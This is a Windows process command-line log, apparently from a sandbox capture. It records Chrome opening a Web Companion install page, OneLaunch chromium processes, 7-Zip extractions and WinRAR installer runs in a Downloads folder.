"C:\Program Files\Google\Chrome\Application\chrome.exe" https://webcompanion.com/en/install.php?partner=IN220101&campaign=18022583703
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff9a469758,0x7fff9a469768,0x7fff9a469778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --mojo-platform-channel-handle=8052 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2520 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4752 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4552 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5368 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --mojo-platform-channel-handle=5032 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --mojo-platform-channel-handle=3444 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --mojo-platform-channel-handle=3388 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --mojo-platform-channel-handle=8172 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --mojo-platform-channel-handle=7936 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --mojo-platform-channel-handle=7488 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --mojo-platform-channel-handle=4896 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --mojo-platform-channel-handle=7604 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --mojo-platform-channel-handle=7436 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --mojo-platform-channel-handle=7808 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6956 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8196 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --mojo-platform-channel-handle=7504 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --mojo-platform-channel-handle=6780 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --mojo-platform-channel-handle=6352 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --mojo-platform-channel-handle=8468 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --mojo-platform-channel-handle=2780 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --mojo-platform-channel-handle=8432 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --mojo-platform-channel-handle=7916 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --mojo-platform-channel-handle=6964 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --mojo-platform-channel-handle=8588 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --mojo-platform-channel-handle=8772 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8724 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --mojo-platform-channel-handle=8924 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --mojo-platform-channel-handle=9032 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --mojo-platform-channel-handle=9256 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --mojo-platform-channel-handle=9380 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --mojo-platform-channel-handle=9488 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --mojo-platform-channel-handle=8284 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap10166:82:7zEvent26026
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6600 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --mojo-platform-channel-handle=9332 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --mojo-platform-channel-handle=9232 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --mojo-platform-channel-handle=9276 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --mojo-platform-channel-handle=9344 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --mojo-platform-channel-handle=9544 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --mojo-platform-channel-handle=8868 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --mojo-platform-channel-handle=9572 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --mojo-platform-channel-handle=9164 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap22292:82:7zEvent21458
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --mojo-platform-channel-handle=10036 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --mojo-platform-channel-handle=2768 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=128 --mojo-platform-channel-handle=7616 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --mojo-platform-channel-handle=6856 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --mojo-platform-channel-handle=9948 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --mojo-platform-channel-handle=9788 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=132 --mojo-platform-channel-handle=9464 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --mojo-platform-channel-handle=9356 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --mojo-platform-channel-handle=10176 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --mojo-platform-channel-handle=10252 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4716 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --mojo-platform-channel-handle=8360 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --mojo-platform-channel-handle=9856 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --mojo-platform-channel-handle=8852 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --mojo-platform-channel-handle=9168 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9236 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8688 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=142 --mojo-platform-channel-handle=6708 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=143 --mojo-platform-channel-handle=9304 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10448 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7972 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7892 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9580 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10344 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\winrar-x64-622.exe
"C:\Users\Admin\Downloads\winrar-x64-622.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\3fa25d8280f94a999541a062904a0f1a /t 6680 /p 7776
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9224 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7440 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10464 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10760 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9876 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\winrar-x64-622 (1).exe
"C:\Users\Admin\Downloads\winrar-x64-622 (1).exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
